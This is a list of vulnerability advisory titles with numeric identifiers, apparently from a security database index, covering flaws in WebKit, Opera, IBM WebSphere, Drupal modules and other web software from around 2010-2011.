[51086] Websense Triton 'ws_irpt.exe' Remote Command Execution Vulnerability
[51066] Opera Web Browser IFRAME Loading Information Disclosure Vulnerability
[51054] WebKit 'getComputedStyle()' Information Disclosure Vulnerability
[51050] WebKit CVE-2011-4692 Image Handling Information Disclosure Vulnerability
[51044] Barracuda Web Filter Multiple HTML Injection Vulnerabilities
[51035] WebKit 'font-face' Element Use-After-Free Remote Code Execution Vulnerability
[51032] WebKit Style Sheet Elements CVE-2011-2341 Remote Code Execution Vulnerability
[51027] Opera Web Browser Prior to 11.60 Multiple Denial of Service and Unspecified Vulnerabilities
[51026] phpWebSite Unspecified Cross Site Scripting Vulnerability
[50979] Linux Kernel CVE-2011-4087 Bridge Networking Interface Denial of Service Vulnerability
[50916] Opera Web Browser Prior to 11.60 Unspecified Security Vulnerability
[50915] Opera Web Browser 'in' Operator Cross Domain Information Disclosure Vulnerability
[50914] Opera Web Browser Top Level Domains Cross Domain Scripting Vulnerability
[50872] Drupal Webform Validation Module Multiple Cross Site Scripting Vulnerabilities
[50845] Oxide WebServer Directory Traversal Vulnerability
[50836] Schneider Electric Vijeo Historian Web Server Unspecified Directory Traversal Vulnerability
[50834] Schneider Electric Vijeo Historian Web Server Cross Site Scripting Vulnerability
[50827] MiniWeb Denial Of Service and Directory Traversal Vulnerabilities
[50817] libsocialweb Non-SSL Connection Man in The Middle Vulnerability
[50810] Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability
[50734] Website Baker Backup Module Security Bypass Vulnerability
[50729] GoAhead WebServer 'goform/formTest' Multiple Cross Site Scripting Vulnerabilities
[50723] Jetty Web Server Directory Traversal Vulnerability
[50713] webERP Information Disclosure, SQL Injection, and Cross Site Scripting Vulnerabilities
[50694] FreeWebshop 'ajax_save_name.php' Remote Code Execution Vulnerability
[50693] IBM WebSphere MQ Control Command Remote Security Bypass Vulnerability
[50689] Webistry 'pid' Parameter SQL Injection Vulnerability
[50679] Apple WebObjects Unspecified Cross Site Scripting Vulnerability
[50677] InduSoft Web Studio 'CEServer' Component Stack-Based Buffer Overflow Vulnerability
[50675] InduSoft Web Studio 'CEServer.exe' Remote Code Execution Vulnerability
[50636] Drupal Webform CiviCRM Integration Module Unspecified SQL Injection Vulnerability
[50610] IcedTea-Web Plugin CVE-2011-3377 Same Origin Policy Bypass Vulnerability
[50508] Web File Browser 'webFileBrowser.php' Arbitrary File Download Vulnerability
[50503] Serv-U Web Client Unspecified Cross Site Scripting Vulnerability
[50473] GE Proficy Historian Web Administrator Cross Site Scripting Vulnerability
[50466] IBM WebSphere MQ Disk Consumption Denial Of Service Vulnerability
[50463] IBM WebSphere Application JavaServer Faces Functionality Information Disclosure Vulnerability
[50461] IBM WebSphere MQ Group Names Local Security Bypass Vulnerability
[50460] IBM WebSphere MQ CCDT File Local Privilege Escalation Vulnerability
[50421] Opera Web Browser Escape Sequence Stack Buffer Overflow Denial of Service Vulnerability
[50402] RoundCube Webmail Denial of Service Vulnerability
[50373] Cisco WebEx WRF and ATAS32 File Format Multiple Remote Buffer Overflow Vulnerabilities
[50368] IBM WebSphere ILOG Rule Team Server Unspecified Cross Site Scripting Vulnerability
[50361] Retired: Microsoft Outlook Web Access Session Replay Security Bypass Vulnerability
[50341] McAfee Web Gateway Web Access Cross Site Scripting Vulnerability
[50320] Opera Web Browser Tree Traversing Use-After-Free Memory Corruption Vulnerability
[50313] Red Hat Linux Kernel Ethernet Bridge Interface Denial of Service Vulnerability
[50310] IBM WebSphere Application Server LTPA Tokens Security Bypass Vulnerability
[50298] Splunk Web Component Remote Denial of Service Vulnerability
[50212] Oracle Fusion Middleware CVE-2011-2237 Remote Oracle Web Services Manager Vulnerability
[50210] Oracle Fusion Middleware CVE-2011-2318 Oracle WebLogic Server Local Vulnerability
[50209] Oracle Fusion Middleware CVE-2011-3523 Remote Oracle Web Services Manager Vulnerability
[50206] Oracle Fusion Middleware CVE-2011-2319 Remote Oracle WebLogic Server Vulnerability
[50205] Oracle Fusion Middleware CVE-2011-2255 Remote Oracle WebLogic Portal Vulnerability
[50198] Oracle Fusion Middleware CVE-2011-2320 Remote WebLogic Server Vulnerability
[50180] WebKit Private Browsing Security Bypass Vulnerability
[50175] phpMyAdmin Setup Interface Cross Site Scripting Vulnerability
[50122] Apple Mac OS X QuickTime 'Save for Web' Feature HTML Injection Vulnerability
[50088] WebKit Inactive DOM Windows Cross Domain Scripting Vulnerability
[50066] WebKit Multiple Unspecified Remote Code Execution Vulnerabilities
[50062] WebKit 'stale node' Remote Code Execution Vulnerability
[50059] Kent Web Forum Unspecified HTML Injection Vulnerability
[50057] Kent Web Forum Unspecified Cross Site Scripting Vulnerability
[50056] IBM WebSphere ILOG Rule Team Server 'project' Parameter Cross Site Scripting Vulnerability
[50048] Certec atvise webMI2ADS Web Server Multiple Remote Vulnerabilities
[50044] Opera Web Browser SVG Layout Memory Corruption Vulnerability
[50039] GoAhead WebServer Multiple HTML Injection Vulnerabilities
[50035] Roundcube Webmail '_user' Parameter SQL Injection Vulnerability
[49929] Joomla! Google Website Optimizer Component HTML Injection Vulnerability
[49917] QtWeb Browser Address Bar URI Spoofing Vulnerability
[49874] WordPress Web Minimalist Theme 'index.php' Cross Site Scripting Vulnerability
[49836] TYPO3 T3C Podcasts Web Functionality Inclusion Security Vulnerability
[49779] Novell GroupWise Internet Agent HTTP Interface Stack Buffer Overflow Vulnerability
[49773] Novell GroupWise 8 WebAccess 'Directory.Item' Parameters Cross-Site Scripting Vulnerabilities
[49766] IBM WebSphere Application Server Cross-Site Request Forgery Vulnerability
[49753] IceWarp Web Mail Multiple Information Disclosure Vulnerabilities
[49690] WordPress Zingiri Web Shop Plugin 'wpabspath' Parameter Remote File Include Vulnerability
[49685] WordPress AllWebMenus Plugin 'abspath' Parameter Remote File Include Vulnerability
[49647] DivX Plus Web Player 'file://' URL Stack Buffer Overflow Vulnerability
[49646] SAP Web Application Server WEBRFC ICF Service Cross-Site Scripting Vulnerability
[49645] SAP WebAS 'cachetest' Service Denial of Service Vulnerability
[49643] IBM WebSphere Commerce Activity Token Authentication Unspecified Security Vulnerability
[49642] SAP WebAS Malicious SAP Shortcut Generation Remote Command Injection Vulnerability
[49544] Xataface WebAuction and Librarian DB Multiple Input Validation Vulnerabilities
[49496] Website Baker Unspecified Cross Site Scripting Vulnerability
[49428] BroadWin WebAccess Client 'bwocxrun.ocx' Multiple Remote Vulnerabilities
[49399] Web Professional 'default.php' SQL Injection Vulnerability
[49393] TinyWebGallery Local File Include and SQL Injection Vulnerabilities
[49389] IBM WebSphere Application Server Tomcat Webdav Servlet Unspecified Vulnerability
[49388] Opera Web Browser Information Disclosure Vulnerability
[49363] Babelweb 'user' Option Local Privilege Escalation Weakness
[49362] IBM WebSphere Application Server Administration Console Information Disclosure Vulnerability
[49354] phpWebSite 'mod.php' SQL Injection Vulnerability
[49350] WebKit Unspecified Memory Corruption Remote Code Execution Vulnerability
[49345] HP SiteScope Administration Interface Security Bypass Vulnerability
[49240] IBM WebSphere Service Registry and Repository 'agentDetect.jsp' Cross Site Scripting Vulnerability
[49239] Mozilla Firefox and Thunderbird CVE-2011-2989 WebGL Memory Corruption Vulnerability
[49229] RoundCube Webmail '_mbox' Parameter Cross Site Scripting Vulnerability
[49185] Website Baker 'upload.php' Arbitrary File Upload Vulnerability
[49176] phpWebSite 'page_id' Parameter Cross Site Scripting Vulnerability
[49137] Open Handset Alliance Android Web Browser Secure Cookie Security Bypass Vulnerability
[49134] Opera Web Browser Secure Cookie Security Bypass Vulnerability
[49112] HP webOS Calendar Application Remote Script Code Injection Vulnerability
[49111] HP webOS Contacts Application CVE-2011-2408 Remote Script Code Injection Vulnerability
[49040] Microsoft Remote Desktop Web Access CVE-2011-1263 Cross Site Scripting Vulnerability
[49001] Drupal iWebkit Theme Menu Links HTML Injection Vulnerability
[48921] MyWebServer dot Character Remote Script File Disclosure Vulnerability
[48920] MyWebServer Remote Buffer Overflow Vulnerability
[48898] Citrix XenApp and XenDesktop XML Service Interface Multiple Remote Code Execution Vulnerabilities
[48878] Willscript Recipes Website Script Silver Edition 'viewRecipe.php' SQL Injection Vulnerability
[48860] WebKit URL Handling Information Disclosure Vulnerability
[48859] WebKit Embedded URL Cross Domain Scripting Vulnerability
[48858] WebKit CVE-2011-1797 Memory Corruption Remote Code Execution Vulnerability
[48857] WebKit CVE-2011-1462 Memory Corruption Remote Code Execution Vulnerability
[48856] WebKit CVE-2011-1457 Memory Corruption Remote Code Execution Vulnerability
[48855] WebKit CVE-2011-1453 Memory Corruption Remote Code Execution Vulnerability
[48854] WebKit CVE-2011-1288 Memory Corruption Remote Code Execution Vulnerability
[48853] WebKit CVE-2011-0255 Memory Corruption Remote Code Execution Vulnerability
[48852] WebKit 'NamedNodeMap.cpp' Memory Corruption Remote Code Execution Vulnerability
[48851] WebKit CVE-2011-0253 Memory Corruption Remote Code Execution Vulnerability
[48850] WebKit CVE-2011-0238 Memory Corruption Remote Code Execution Vulnerability
[48849] WebKit CVE-2011-0237 Memory Corruption Remote Code Execution Vulnerability
[48848] WebKit CVE-2011-0235 Memory Corruption Remote Code Execution Vulnerability
[48847] WebKit FrameOwner Element Memory Corruption Remote Code Execution Vulnerability
[48846] WebKit CVE-2011-0232 Memory Corruption Remote Code Execution Vulnerability
[48845] WebKit CVE-2011-0225 Memory Corruption Remote Code Execution Vulnerability
[48844] WebKit CVE-2011-0222 Memory Corruption Remote Code Execution Vulnerability
[48843] WebKit CVE-2011-0221 Memory Corruption Remote Code Execution Vulnerability
[48842] WebKit CVE-2011-0218 Memory Corruption Remote Code Execution Vulnerability
[48840] WebKit 'libxslt' Remote Code Execution Vulnerability
[48839] Apple Safari 'AutoFill web forms' Feature Information Disclosure Vulnerability
[48829] IcedTea6 and IcedTea-Web Information Disclosure and Security Bypass Vulnerabilities
[48827] WebKit SVG Tags 'animVal' Property Use-After-Free Remote Code Execution Vulnerability
[48825] WebKit Malformed 'TIFF' Image Use After Free Memory Corruption Vulnerability
[48824] WebKit MathML Tags Use-After-Free Remote Code Execution Vulnerability
[48823] WebKit Malformed XHTML Tags Use After Free Memory Corruption Vulnerability
[48820] WebKit Frameset Elements Memory Corruption Vulnerability
[48710] IBM WebSphere Application Server 'logoutExitPage' Parameter Security Bypass Vulnerability
[48709] IBM WebSphere Application Server Administration Console Local Information Disclosure Vulnerability
[48683] Auto Web Toolbox 'id' Parameter SQL Injection Vulnerability
[48679] Hitachi JP1/Performance Management Web Console Unspecified Cross-Site Scripting Vulnerability
[48636] IBM WebSphere MQ CDP Extension Revoked SSL Certificate Validation Security Bypass Vulnerability
[48634] Opera Web Browser Prior to 11.10 Multiple Security Weaknesses
[48613] HP webOS Contacts Application Multiple Cross Site Scripting Vulnerabilities
[48579] F5 BIG-IP ASM Web Scraping Cross-Site Scripting Vulnerability
[48570] Opera Web Browser Prior to 11.11 Multiple Remote Denial of Service Vulnerabilities
[48569] Opera Web Browser Prior to 11.10 Multiple Remote Denial of Service Vulnerabilities
[48568] Opera Web Browser CVE-2011-2610 Unspecified Security Vulnerability
[48556] Opera Web Browser Multiple Remote Denial of Service Vulnerabilities
[48555] WeBid Local File Include and SQL Injection Vulnerabilities
[48554] WeBid 'converter.php' Multiple Remote PHP Code Injection Vulnerabilities
[48550] iMesh 'IMWebControl.dll' ActiveX Control Buffer Overflow Vulnerability
[48546] WebCalendar Multiple Cross Site Scripting Vulnerabilities
[48501] Opera Web Browser URL Handling Denial of Service Vulnerability
[48500] Opera Web Browser Unspecified Cross Site Scripting Vulnerability
[48476] RealityServer Web Services RTMP Server NULL Pointer Dereference Denial Of Service Vulnerability
[48414] WebCAT 'cms_view.php' Multiple SQL Injection Vulnerabilities
[48406] NetServe Web Server Multiple Security Vulnerabilities
[48375] Mozilla Firefox WebGL Invalid Write Remote Code Execution Vulnerability
[48371] Mozilla Firefox WebGL Out of Bound Read Information Disclosure Vulnerability
[48370] IBM Web Application Firewall Security Bypass Vulnerability
[48362] CIDWeb Multiple Cross Site Scripting Vulnerabilities
[48338] WeblyGo Unspecified Cross Site Scripting Vulnerability
[48324] WeBid 'adsearch.php' HTML Injection Vulnerability
[48323] Hitachi Web Server Unspecified Remote Denial of Service Vulnerability
[48319] Mozilla Firefox WebGL Information Disclosure Vulnerability
[48318] Symantec Web Gateway Management GUI 'forget.php' SQL Injection Vulnerability
[48305] IBM WebSphere Application Server Administration Console Cross Site Request Forgery Vulnerability
[48262] Opera Web Browser 11.11 Denial of Service Vulnerability
[48233] WebFileExplorer 'user' and 'pass' SQL Injection Vulnerabilities
[48175] Microsoft Active Directory Certificate Services Web Enrollment Cross-Site Scripting Vulnerability
[48116] Simple web-server Directory Traversal Vulnerability
[48102] WebSVN 'path' Parameter Remote Command Injection Vulnerability
[48082] CodeMeter WebAdmin 'Licenses.html' Cross Site Scripting Vulnerability
[48062] Imperva SecureSphere Web Application Firewall And MX Management Server HTML Injection Vulnerability
[48044] IBM Web Content Management Authoring Tool Component Security Bypass Vulnerability
[48041] IBM Web Content Management Race Condition Denial Of Service Vulnerability
[48040] IBM WebSphere Portal 'OutputMediator' Objects Denial Of Service Vulnerability
[48002] WebDefend Enterprise Manager Appliance Hard Coded Authentication Security Bypass Vulnerability
[48000] Eucalyptus SOAP Interface Remote Arbitrary Command Injection Vulnerability
[47985] Cisco RVS4000 and WRVS4400N Web Management Private/Public Keys Information Disclosure Vulnerability
[47983] Cisco IOS XR SPA Interface Processor Remote Denial of Service Vulnerability
[47979] Cisco CDS Internet Streamer Web Server Remote Denial of Service Vulnerability
[47970] MidiCMS Website Builder Local File Include and Arbitrary File Upload Vulnerabilities
[47954] IBM WebSphere Portal Search Center Unspecified Cross Site Scripting Vulnerability
[47915] Drupal Webform Module Cross Site Scripting and Arbitrary File Upload Vulnerabilities
[47906] Opera Web Browser Frameset Constructs Memory Corruption Vulnerability
[47876] Web File Browser Arbitrary File Upload Vulnerability
[47874] Mitel Audio and Web Conferencing Multiple Cross Site Scripting Vulnerabilities
[47842] InduSoft Web Studio Directory Traversal Vulnerability
[47831] IBM WebSphere Application Server WS-Security XML Encryption Weakness
[47830] Google Chrome WebKit Glue Bad Cast Remote Code Execution Vulnerability
[47829] Trustwave WebDefend Enterprise Multiple Information Disclosure Vulnerabilities
[47788] HP webOS Plug-in Development Kit (PDK) Remote Script Code Injection Vulnerability
[47787] HP WebOS Email Application Multiple HTML Injection Vulnerabilities
[47764] Opera Web Browser 'SELECT' HTML Tag Remote Memory Corruption Vulnerability
[47759] phpWebSite 'upload.php' Arbitrary File Upload Vulnerability
[47753] BlueVoda Website Builder '.bvp' File Stack-Based Buffer Overflow Vulnerability
[47704] ICONICS WebHMI ActiveX Control Stack Buffer Overflow Vulnerability
[47703] Horizon WEB BUILDER 'fshow.php' SQL Injection Vulnerability
[47682] Web Auction 'lang' Parameter Cross Site Scripting Vulnerability
[47672] LANSA aXes Web Terminal TN5250 'axes_default.css' Cross Site Scripting Vulnerability
[47661] WebGL Library Multiple Memory Corruption Vulnerabilities
[47601] Trustwave WebDefend Local Privilege Escalation Vulnerability
[47599] up.time Software Administration Interface Remote Authentication Bypass Vulnerability
[47593] Football Website Manager SQL Injection and Multiple HTML Injection Vulnerabilities
[47588] Computer Associates Arcot WebFort VAS Unspecified URI Redirection Vulnerability
[47587] CA Arcot WebFort Versatile Authentication Server Cross Site Scripting Vulnerability
[47586] Hitachi Web Server 'RequestHeader' Directive Information Disclosure Vulnerability
[47585] Hitachi Web Server SSL/TLS Protocol Information Disclosure Vulnerability
[47573] webERP 'AccountGroups.php' Cross Site Scripting Vulnerability
[47560] DynMedia Pro Web CMS 'downloadfile.php' Local File Disclosure Vulnerability
[47559] 360 Web Manager 'assetmanager.php' Multiple Arbitrary File Access Vulnerabilities
[47558] Webmin 'useradmin/index.cgi' Local Privilege Escalation Vulnerability
[47539] web2Project 'calendar.php' SQL Injection Vulnerability
[47537] Asterisk Manager Interface Arbitrary Command Execution Security Bypass Vulnerability
[47521] CA Output Management Web Viewer Multiple Stack Based Buffer Overflow Vulnerabilities
[47500] webSPELL Multiple Cross-Site Scripting Vulnerabilities
[47495] WebKit Malformed SVG Document Processing Remote Code Execution Vulnerability
[47487] Oracle Java System Access Manager Policy Agent CVE-2011-0846 Remote Web Proxy Agent Vulnerability
[47482] WebKit Detached Body Element Remote Code Execution Vulnerability
[47474] WebKit Undefined DOM Prototype Attachment Remote Code Execution Vulnerability
[47434] Oracle E-Business Suite CVE-2011-0809 Web ADI Remote Vulnerability
[47409] WebKit 'CSSComputedStyleDeclaration.cpp' Null Pointer Dereference Denial of Service Vulnerability
[47375] Qianbo Enterprise Web Site Management System 'Keyword' Parameter Cross Site Scripting Vulnerability
[47357] Computer Associates Total Defense Heartbeat Web Service Remote Code Execution Vulnerability
[47332] Website Baker Multiple SQL Injection Vulnerabilities
[47328] WebCalendar Multiple Cross Site Scripting Vulnerabilities
[47324] BlackBerry Enterprise Server Web Desktop Manager Component Cross Site Scripting Vulnerability
[47271] Cyber-Ark PIM Suite Password Vault Web Access Cross Site Scripting Vulnerability
[47247] RoundCube Webmail Remote Mail Relay Vulnerability
[47165] WebCalendar 'edit_entry_handler.php' Multiple Cross Site Scripting Vulnerabilities
[47122] IBM WebSphere Application Server for z/OS Local Unauthorized Access Vulnerability
[47120] IBM WEBi Cross Site Scripting And Information Disclosure Vulnerabilities
[47072] Easy File Sharing Web Server Multiple Security Vulnerabilities
[47065] webEdition CMS 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability
[47050] wodWebServer.NET Directory Traversal Vulnerability
[47047] webEdition CMS HTML Injection and Local File Include Vulnerabilities
[47020] Webkit Address Bar URI Spoofing Vulnerability
[47017] Ripe Website Manager Cross Site Scripting and Multiple SQL Injection Vulnerabilities
[47013] Drupal Webform Block Module Cross Site Scripting Vulnerability
[47008] Advantech/BroadWin SCADA WebAccess Multiple Remote Security Vulnerabilities
[46932] Web Poll Pro 'error' Parameter HTML Injection Vulnerability
[46910] Fake Webcam '.wmv' File Processing Remote Denial of Service Vulnerability
[46897] Asterisk Manager Interface Remote Denial of Service Vulnerability
[46877] CMS WebManager-Pro 'menu_id' Parameter Cross Site Scripting Vulnerability
[46872] Opera Web Browser Window Null Pointer Dereference Denial of Service Vulnerability
[46870] SSWebPlus 'idx' Parameter SQL Injection Vulnerability
[46864] Trend Micro WebReputation API URI Security Bypass Vulnerability
[46849] WebKit Style Handling Memory Corruption Vulnerability
[46829] LMS Web Ensino Multiple Input Validation Vulnerabilities
[46822] WebKit WBR Tags Use-After-Free Remote Code Execution Vulnerability
[46816] WebKit Local Webpage Cross Domain Information Disclosure Vulnerability
[46814] WebKit 'Attr.style' Accessor Cross Domain Script Injection Vulnerability
[46811] WebKit 'HTML5' Drag and Drop Cross-Origin Information Disclosure Vulnerability
[46809] WebKit 'window.console._inspectorCommandLineAPI' Property Cross Domain Scripting Vulnerability
[46808] WebKit CVE-2011-0160 Unspecified Memory Corruption Vulnerability
[46807] WebKit CVE-2011-0157 Unspecified Memory Corruption Vulnerability
[46765] Bacula-web 'report.php' Cross Site Scripting and SQL Injection Vulnerabilities
[46757] WellinTech KingView 'KVWebSvr.dll' ActiveX Control Heap Buffer Overflow Vulnerability
[46749] WebKit CVE-2011-0133 Glyph Data Memory Corruption Vulnerability
[46748] WebKit 'Runin' Box CVE-2011-0132 Use-After-Free Memory Corruption Vulnerability
[46747] WebKit CVE-2011-0116 'setOuterText()' Method Memory Corruption Remote Code Execution Vulnerability
[46746] WebKit Range Object Remote Code Execution Vulnerability
[46745] WebKit CVE-2011-0154 Javascript 'sort()' Method Memory Corruption Vulnerability
[46744] WebKit CVE-2011-0149 'HTMLBRElement' Style Memory Corruption Vulnerability
[46742] Maian Weblog 'index.php' SQL Injection Vulnerability
[46736] IBM WebSphere Application Server prior to 7.0.0.15 Multiple Security Vulnerabilities
[46728] WebKit CVE-2011-0113 Unspecified Memory Corruption Vulnerability
[46727] WebKit CVE-2011-0126 Unspecified Memory Corruption Vulnerability
[46726] WebKit CVE-2011-0112 Unspecified Memory Corruption Vulnerability
[46725] WebKit CVE-2011-0124 Unspecified Memory Corruption Vulnerability
[46724] WebKit CVE-2011-0156 Unspecified Memory Corruption Vulnerability
[46723] WebKit CVE-2011-0122 Unspecified Memory Corruption Vulnerability
[46722] WebKit CVE-2011-0168 Unspecified Memory Corruption Vulnerability
[46721] WebKit CVE-2011-0155 Unspecified Memory Corruption Vulnerability
[46720] WebKit CVE-2011-0153 Unspecified Memory Corruption Vulnerability
[46719] WebKit CVE-2011-0151 Unspecified Memory Corruption Vulnerability
[46718] WebKit CVE-2011-0152 Unspecified Memory Corruption Vulnerability
[46717] WebKit CVE-2011-0150 Unspecified Memory Corruption Vulnerability
[46716] WebKit CVE-2011-0165 Unspecified Memory Corruption Vulnerability
[46715] WebKit CVE-2011-0146 Unspecified Memory Corruption Vulnerability
[46714] WebKit CVE-2011-0140 Unspecified Memory Corruption Vulnerability
[46713] WebKit CVE-2011-0138 Unspecified Memory Corruption Vulnerability
[46712] WebKit CVE-2011-0139 Unspecified Memory Corruption Vulnerability
[46711] WebKit CVE-2011-0134 Unspecified Memory Corruption Vulnerability
[46710] WebKit CVE-2011-0145 Unspecified Memory Corruption Vulnerability
[46709] WebKit CVE-2011-0135 Unspecified Memory Corruption Vulnerability
[46708] WebKit CVE-2011-0148 Unspecified Memory Corruption Vulnerability
[46707] WebKit CVE-2011-0137 Unspecified Memory Corruption Vulnerability
[46706] WebKit CVE-2011-0142 Unspecified Memory Corruption Vulnerability
[46705] WebKit CVE-2011-0127 Unspecified Memory Corruption Vulnerability
[46704] WebKit CVE-2011-0131 Unspecified Memory Corruption Vulnerability
[46703] WebKit CVE-2011-0164 Unspecified Memory Corruption Vulnerability
[46702] WebKit CVE-2011-0147 Unspecified Memory Corruption Vulnerability
[46701] WebKit CVE-2011-0125 Unspecified Memory Corruption Vulnerability
[46700] WebKit CVE-2011-0130 Unspecified Memory Corruption Vulnerability
[46699] WebKit CVE-2011-0144 Unspecified Memory Corruption Vulnerability
[46698] WebKit CVE-2011-0123 Unspecified Memory Corruption Vulnerability
[46696] WebKit CVE-2011-0121 Unspecified Memory Corruption Vulnerability
[46695] WebKit CVE-2011-0143 Unspecified Memory Corruption Vulnerability
[46694] WebKit CVE-2011-0120 Unspecified Memory Corruption Vulnerability
[46693] WebKit CVE-2011-0129 Unspecified Memory Corruption Vulnerability
[46692] WebKit CVE-2011-0128 Unspecified Memory Corruption Vulnerability
[46691] WebKit CVE-2011-0114 Unspecified Memory Corruption Vulnerability
[46690] WebKit CVE-2011-0136 Unspecified Memory Corruption Vulnerability
[46689] WebKit CVE-2011-0141 Unspecified Memory Corruption Vulnerability
[46688] WebKit CVE-2011-0119 Unspecified Memory Corruption Vulnerability
[46687] WebKit CVE-2011-0118 Unspecified Memory Corruption Vulnerability
[46686] WebKit CVE-2011-0117 Unspecified Memory Corruption Vulnerability
[46684] WebKit CVE-2011-0111 Unspecified Memory Corruption Vulnerability
[46677] WebKit SVG styles Use-after-free Memory Corruption Vulnerability
[46673] phpWebSite 'local' Parameter Cross Site Scripting Vulnerability
[46655] pywebdav MySQL Authentication Module SQL Injection Vulnerability
[46654] RETIRED: WebKit Multiple Memory Corruption Vulnerabilities
[46595] HP Web Jetadmin Unspecified Local Security Bypass Vulnerability
[46577] WebKit 'HistoryController' Denial of Service Vulnerability
[46566] web.go 'get_secure_cookie' Unauthorized Access Vulnerability
[46547] F-Secure Policy Manager 'WebReporting' Module Cross Site Scripting Vulnerability
[46503] DIY Web CMS Cross Site Scripting and Multiple SQL Injection Vulnerabilities
[46490] Aptdaemon D-Bus Interface Local Security Bypass Vulnerability
[46468] PIPI Player 'PIPIWebPlayer.ocx' ActiveX Multiple Buffer Overflow Vulnerabilities
[46449] IBM WebSphere Application Server Login Module Security Bypass Vulnerability
[46423] Ruby on Rails 'WEBrick::HTTPRequest' Module HTTP Header Injection Vulnerability
[46374] A1 Website Download 'fwpuclnt.dll' DLL Loading Arbitrary Code Execution Vulnerability
[46341] webERP 'InputSerialItemsFile.php' Arbitrary File Upload Vulnerability
[46303] CGI:IRC 'nonjs' Interface Cross Site Scripting Vulnerability
[46250] WebAsyst Shop-Script Cross Site Scripting and HTML Injection Vulnerabilities
[46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
[46162] Microsoft Windows Azure Web Role Information Disclosure Vulnerability
[46160] Xerox WorkCentre Webserver Unspecified Remote Command Execution Vulnerability
[46131] Web Wiz Forums Multiple SQL Injection Vulnerabilities
[46086] TinyWebGallery Cross Site Scripting and Local File Include Vulnerabilities
[46078] Cisco WebEx ATP File Remote Stack Buffer Overflow Vulnerability
[46075] Cisco WebEx WRF and ARF File Format Multiple Remote Buffer Overflow Vulnerabilities
[46067] web@all Multiple Cross Site Scripting and SQL Injection Vulnerabilities
[46054] Weborf 'get_param_value()' Function HTTP Header Handling Denial Of Service Vulnerability
[46036] Opera Web Browser Multiple Security Vulnerabilities
[46015] AB WEB CMS 'ab_gp_detail.php' Cross Site Scripting and SQL Injection Vulnerabilities
[46003] Opera Web Browser 'option' HTML Element Integer Overflow Vulnerability
[45989] IBM WebSphere Portal and Workplace Web Content Management Information Disclosure Vulnerability
[45985] ActiveWeb Professional Arbitrary File Upload Vulnerability
[45976] web@all 'url' Parameter Cross Site Scripting Vulnerability
[45951] Opera Web Browser 'Select' HTML Element Integer Overflow Vulnerability
[45923] IBM WebSphere MQ Header Field Remote Buffer Overflow Vulnerability
[45896] Oracle Sun Java System Communications Express CVE-2010-4456 Remote Web Mail Vulnerability
[45877] Oracle Fusion Middleware CVE-2010-4453 Remote Oracle WebLogic Server Vulnerability
[45852] Oracle Weblogic CVE-2010-4437 Remote Session Fixation Vulnerability
[45847] Oracle WebLogic Server CVE-2010-3510 Remote Security Vulnerability
[45827] Advanced Webhost Billing System 'oid' Parameter SQL Injection Vulnerability
[45802] IBM WebSphere Application Server CVE-2011-0315 Cross Site Scripting Vulnerability
[45801] IBM WebSphere MQ Invalid Message Remote Buffer Overflow Vulnerability
[45800] IBM WebSphere Application Console Servlets Information Disclosure Vulnerability
[45783] InduSoft NTWebServer Web Service Stack-Based Buffer Overflow Vulnerability
[45742] Symantec Web Gateway Management GUI SQL Injection Vulnerability
[45734] Drupal Webform Module Unspecified SQL Injection Vulnerability
[45722] WebKit CSS Token Sequences Handling Denial of Service Vulnerability
[45721] Webkit SVG Out of Bound Array Denial of Service Vulnerability
[45720] WebKit Text Editing Use After Free Memory Corruption Vulnerability
[45719] WebKit Large Text Area (CVE-2010-4198) Denial of Service Vulnerability
[45718] Webkit Frame Object Denial of Service Vulnerability
[45639] Microsoft Internet Explorer 'ReleaseInterface()' Remote Code Execution Vulnerability
[45613] Yektaweb Academic Web Tools CMS 'browse.php' Cross Site Scripting Vulnerability
[45585] IBM WebSphere Service Registry and Repository Authentication Bypass Vulnerability
[45568] Appweb Web Server Cross Site Scripting Vulnerability
[45567] HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability
[45537] Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability
[45519] PHP Web Scripts Ad Manager Pro 'pageId' Parameter SQL Injection Vulnerability
[45515] Inout Webmail 'emailfilter' Value HTML Injection Vulnerability
[45476] Alt-N WebAdmin Remote Source Code Information Disclosure Vulnerability
[45461] Opera Web Browser Prior to 11.00 Multiple Security Vulnerabilities
[45439] Git gitweb 'index.php' Multiple Cross Site Scripting Vulnerabilities
[45373] Clear iSpot/Clearspot 'cgi-bin/webmain.cgi' Cross Site Request Forgery Vulnerability
[45340] Helix Server Administration Interface Cross Site Request Forgery Vulnerability
[45318] Microsoft Windows Consent User Interface Registry Key Local Privilege Escalation Vulnerability
[45310] Google Web Optimizer Control Script Cross Site Scripting Vulnerability
[45292] IBM WebSphere Commerce Outbound Messaging System Information Disclosure Vulnerability
[45247] HP webOS Contacts Application vCard Remote Script Code Injection Vulnerability
[45199] WebEx Meeting Manager WebexUCFObject ActiveX DLL Loading Arbitrary Code Execution Vulnerability
[45184] HotWeb Scripts HotWeb Rentals 'resorts.asp' SQL Injection Vulnerability
[45172] Palm WebOS Contacts Application HTML Injection Vulnerability
[45105] Kerio Control Web Filter Unspecified Remote Security Vulnerability
[45089] MicroNetSoft RV Dealer Websites Multiple SQL Injection Vulnerabilities
[45066] PHP Web Scripts Easy Banner Free Multiple SQL Injection and HTML Injection Vulnerabilities
[45025] TinyWebGallery Multiple Cross-Site Scripting Vulnerabilities
[45019] webApp.secure 'Content-Length' Remote Denial Of Service Vulnerability
[45008] WebKit (CVE-2010-3829) HTML 'Link' DNS Pre-Fetching Security Bypass Vulnerability
[44971] WebKit Colors in SVG Documents Remote Code Execution Vulnerability
[44970] WebKit SVG Document Use-After-Free Remote Code Execution Vulnerability
[44969] WebKit Geolocation Objects Use-After-Free Remote Code Execution Vulnerability
[44967] WebKit Cascading Style Sheet(CSS) 3D Transforms Remote Code Execution Vulnerability
[44965] WebKit Inline Text Boxes Remote Code Execution Vulnerability
[44964] WebKit Element Scrollbars Use-After-Free Remote Code Execution Vulnerability
[44963] WebKit Cascading Style Sheet Boxes Remote Code Execution Vulnerability
[44962] WebKit (CVE-2010-3822) CSS Counter Styles Remote Code Execution Vulnerability
[44961] WebKit (CVE-2010-3821) Cascading Style Sheets (CSS) Remote Code Execution Vulnerability
[44960] WebKit 'Text' Objects Integer Overflow Remote Code Execution Vulnerability
[44959] WebKit (CVE-2010-3820) Editable Elements Remote Code Execution Vulnerability
[44958] WebKit Element Attributes Use-After-Free Remote Code Execution Vulnerability
[44957] WebKit Inline Styling Command Remote Code Execution Vulnerability
